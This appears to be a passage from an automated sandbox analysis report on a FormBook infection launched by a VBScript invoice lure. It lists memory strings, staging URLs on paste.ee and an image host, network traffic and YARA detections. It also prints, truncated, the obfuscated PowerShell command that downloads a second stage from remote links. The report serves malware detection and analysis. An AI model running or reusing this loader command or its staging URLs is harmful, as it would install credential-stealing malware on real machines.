            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
            Source: powershell.exe, 00000003.00000002.1820058355.0000029F059A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
            Source: explorer.exe, 00000006.00000002.2934766401.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://incoming.telemetry.mozilla.org/submit/firefox-launcher-process/launcher-process-failure/1/
            Source: wscript.exe, 00000000.00000003.1669979049.000001D666A2F000.00000004.00000020.00020000.00000000.sdmp, Signed Proforma Invoice 3645479_pdf.vbsString found in binary or memory: https://lesferch.github.io/DesktopPic
            Source: wscript.exe, 00000000.00000002.1672124633.000001D6672BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665681229.000001D6672BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D6672BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668064506.000001D6672BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfLMEM
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srfS
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: colorcpl.exe, 00000008.00000002.2931288836.0000000003335000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: colorcpl.exe, 00000008.00000003.1893364036.0000000006202000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mozilla.org0/
            Source: explorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
            Source: wscript.exe, 00000000.00000003.1670550299.000001D6672A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665681229.000001D6672A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1671154482.000001D664BF0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668064506.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672124633.000001D6672AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
            Source: wscript.exe, 00000000.00000003.1665768650.000001D667326000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1670550299.000001D6672A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668388101.000001D664CA3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665681229.000001D6672A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668064506.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672124633.000001D6672AA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1663453819.000001D666A2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665946744.000001D6669D8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667628941.000001D666A2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668304258.000001D667264000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1666979969.000001D666A2B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1671343503.000001D664CA4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672049286.000001D667268000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667597717.000001D667261000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669979049.000001D666A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667808699.000001D664C9E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665501762.000001D66730B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/K2No9
            Source: wscript.exe, 00000000.00000003.1668304258.000001D667264000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672049286.000001D667268000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667597717.000001D667261000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/K2No95
            Source: wscript.exe, 00000000.00000003.1670550299.000001D6672A9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665681229.000001D6672A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1668064506.000001D6672A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672124633.000001D6672AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/K2No9qSh
            Source: explorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
            Source: powershell.exe, 00000003.00000002.1820058355.0000029F059A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
            Source: powershell.exe, 00000003.00000002.1819519654.0000029F03B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 00000006.00000000.1815748916.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
            Source: explorer.exe, 00000006.00000000.1815748916.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2944714584.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
            Source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
            Source: wscript.exe, 00000000.00000003.1668064506.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1672069511.000001D667274000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1669455031.000001D666C75000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1667143566.000001D667270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
            Source: explorer.exe, 00000006.00000002.2934766401.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
            Source: explorer.exe, 00000006.00000000.1798545564.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
            Source: explorer.exe, 00000006.00000000.1798545564.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.2934766401.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
            Source: unknownHTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.45.138:443 -> 192.168.2.4:49731 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.4:49733 version: TLS 1.2

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Detected FormBook malware
            Source: C:\Windows\SysWOW64\colorcpl.exeDropped file: C:\Users\user\AppData\Roaming\J4L3O90F\J4Llogri.iniJump to dropped file
            Source: C:\Windows\SysWOW64\colorcpl.exeDropped file: C:\Users\user\AppData\Roaming\J4L3O90F\J4Llogrv.iniJump to dropped file
            Malicious sample detected (through community Yara rule)
            Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000002.2943761942.000000000B429000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
            Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: Process Memory Space: powershell.exe PID: 6236, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: MSBuild.exe PID: 7004, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: Process Memory Space: colorcpl.exe PID: 4584, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Sample has a suspicious name (potential lure to open the executable)
            Source: Signed Proforma Invoice 3645479_pdf.vbsStatic file information: Suspicious name
            Very long command line found
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9154
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 9154Jump to behavior
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgT